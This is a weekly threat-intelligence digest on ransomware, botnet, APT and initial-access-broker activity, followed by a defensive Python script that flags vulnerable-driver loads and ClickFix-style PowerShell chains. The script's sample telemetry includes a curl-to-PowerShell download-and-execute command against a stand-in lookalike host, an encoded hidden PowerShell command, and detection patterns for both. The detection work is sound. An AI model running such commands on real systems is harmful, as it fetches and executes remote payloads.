Weekly Summary Cyberattacks December 04-10
New BYOVD Loader Behind DeadLock Ransomware Attack
A new set of tactics, techniques, and procedures used by a financially motivated threat actor deploying the DeadLock ransomware was uncovered, including a previously unknown Bring Your Own Vulnerable Driver (BYOVD) loader that exploits the Baidu Antivirus driver vulnerability CVE-2024-51324. The attacker dropped a custom loader ("EDRGay.exe") and a renamed vulnerable driver ("DriverGay.sys") onto victim systems, using the loader to initialize and communicate with the legitimate but exploitable BdApiUtil.sys driver. By issuing a crafted DeviceIoControl call with IOCTL code 0x800024b4, the actor leveraged the driver's improper privilege management flaw to terminate antivirus and EDR processes via kernel-level execution of ZwTerminateProcess(), achieving full defense evasion before the ransomware was deployed.
LockBit Ransomware Group Returns with New Data Leak Site, 21 Victims
According to information dated December 5, 2025 (updated December 8), the LockBit ransomware group is attempting a renewed comeback, launching a new Dark Web data leak site and claiming 21 victims. Once considered the most dominant ransomware operation globally (with more than 2,700 claimed victims over six years), LockBit's activity sharply declined following coordinated international law enforcement actions in early 2024, after which the group struggled to regain momentum. Its LockBit 4.0 version, released in early 2025, failed to achieve adoption among affiliates, while competing groups such as Qilin attracted operators with more favorable terms and improved feature sets. However, the introduction of LockBit 5.0, internally codenamed ChuongDong and announced on the RAMP forum in September, appears to be reinvigorating the group's activity.
Aisuru Botnet Behind New Record-Breaking 29.7 Tbps DDoS Attack
According to information dated December 3, 2025, the Aisuru botnet has been identified as the source of a new record-breaking distributed denial-of-service (DDoS) attack that peaked at 29.7 terabits per second, marking the most powerful attack ever observed. Aisuru, a large-scale botnet-for-hire comprising one to four million compromised routers and IoT devices infected via known vulnerabilities and brute-forced credentials, launched more than 1,300 DDoS attacks in the past three months, nearly half of which exceeded 1 Tbps.
Exclusive Look Inside a Compromised North Korean APT Machine Linked to The Biggest Heist in History
A rare incident in which a North Korean state-sponsored threat actor's own development machine was compromised by the LummaC2 infostealer was detected, exposing internal operational details tied directly to the historic $1.4 billion Bybit cryptocurrency heist. Hudson Rock obtained the stolen data from a LummaC2 log and identified the victim not as an ordinary user but as a high-level DPRK malware developer operating a sophisticated malware engineering rig.
Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation
Security researchers report that the initial access broker (IAB) Storm-0249 has significantly evolved from a mass-phishing operation into a highly selective, post-exploitation threat actor capable of hijacking enterprise Endpoint Detection and Response (EDR) tools to enable ransomware affiliates. Storm-0249's recent campaigns begin with ClickFix-style social engineering, tricking users into executing encoded commands via the Windows Run dialog. This triggers a multi-stage intrusion chain in which curl.exe downloads payloads from attacker-controlled infrastructure disguised as Microsoft domains, and pipes the downloaded script directly into fileless PowerShell execution, bypassing disk-based detection.
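Two of the items above describe host-level behaviour a defender can look for: the DeadLock BYOVD chain (a vulnerable driver loaded under a new name from wherever the loader dropped it) and the Storm-0249 chain (encoded commands from the Run dialog, then curl.exe piped into PowerShell). The following triage script is an added example, not part of this summary or of any vendor's tooling; it runs over constructed Sysmon-style DriverLoad (Event 6) and ProcessCreate (Event 1) records, and it assumes that Run-dialog launches appear with explorer.exe as the parent process and that the only driver indicators available are the two file names named above (no hashes are given here).

```python
import re
# DeadLock BYOVD chain: the legitimate Baidu driver and the attacker's renamed
# copy. The summary gives no hashes, so matching is by file name and load path.
KNOWN_VULN_DRIVERS = {"bdapiutil.sys", "drivergay.sys"}
SYSTEM_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
# Storm-0249 chain: encoded PowerShell from the Run dialog (explorer.exe as
# parent is an assumption) and curl.exe output piped straight into PowerShell.
ENCODED_PS = re.compile(r"powershell(\.exe)?\s.*-(e|en|enc|encodedcommand)\b", re.I)
CURL_PIPE_PS = re.compile(r"curl(\.exe)?\s.*\|\s*powershell", re.I)

def check_driver_load(ev: dict) -> list:
    """Sysmon Event 6 (DriverLoad): known-vulnerable name or non-system path."""
    path = str(ev.get("ImageLoaded", "")).lower()
    name = path.rsplit("\\", 1)[-1]
    findings = []
    if name in KNOWN_VULN_DRIVERS:
        findings.append(f"known vulnerable driver loaded: {name}")
    if not path.startswith(SYSTEM_DRIVER_DIR):
        findings.append(f"driver loaded from non-system path: {path}")
    return findings

def check_process_create(ev: dict) -> list:
    """Sysmon Event 1 (ProcessCreate): ClickFix -> curl -> fileless PowerShell."""
    cmd = str(ev.get("CommandLine", ""))
    parent = str(ev.get("ParentImage", "")).lower().rsplit("\\", 1)[-1]
    findings = []
    if parent == "explorer.exe" and ENCODED_PS.search(cmd):
        findings.append("encoded PowerShell spawned from explorer.exe (Run dialog)")
    if CURL_PIPE_PS.search(cmd):
        findings.append("curl.exe output piped into PowerShell")
    return findings

def triage(events: list) -> list:
    """One finding per suspicious observation, in event order."""
    out = []
    for ev in events:
        if ev.get("EventID") == 6:
            out.extend(check_driver_load(ev))
        elif ev.get("EventID") == 1:
            out.extend(check_process_create(ev))
    return out

SAMPLE_EVENTS = [  # constructed telemetry, not from any real incident
    {"EventID": 6, "ImageLoaded": "C:\\Users\\Public\\DriverGay.sys"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -nop -w hidden -enc QUJDREVGRw=="},
    {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "curl.exe -s https://update.ms-lookalike.example/s.ps1 | powershell -"},
]
```

The non-system-path check is what catches the renamed copy even when the name list is stale; `triage(SAMPLE_EVENTS)` yields four findings for the constructed records.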